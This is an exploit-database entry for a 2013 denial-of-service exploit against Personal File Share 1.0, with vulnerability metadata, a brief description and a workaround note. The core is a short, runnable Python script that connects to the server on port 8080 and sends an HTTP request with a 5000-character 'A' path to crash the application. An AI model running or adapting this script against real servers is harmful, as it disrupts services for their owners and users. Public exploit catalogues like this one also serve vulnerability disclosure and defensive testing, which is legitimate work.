header-logo
Suggest Exploit
vendor:
Personal File Share
by:
npn
7,5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Personal File Share
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:srplab:personal_file_share:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 English
2013

Personal File Share 1.0 DoS

This exploit is a Denial of Service (DoS) attack against Personal File Share 1.0. It sends a large number of 'A' characters to the server, which causes the application to crash. The exploit was tested on Windows XP SP3 English.

Mitigation:

The vendor has not released a patch for this vulnerability. As a workaround, users should ensure that the application is not exposed to the public internet.
Source

Exploit-DB raw data:

#!/usr/bin/python

#Exploit Title: Personal File Share 1.0 DoS
#Date: 2nd April 2013
#Exploit Author: npn
#Vendor Homepage: http://www.srplab.com/
#Software Link: http://download.cnet.com/Personal-File-Share/3000-18506_4-75893424.html
#Version: 1.0                
#Tested on: Windows XP SP3 English

import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.32.129", 8080))

buffer = "GET /"
buffer += "A"*5000
buffer += " HTTP/1.1\r\n\r\n"

sock.send(buffer)

sock.close()

Navigation

Suggest Exploit

Services By CQR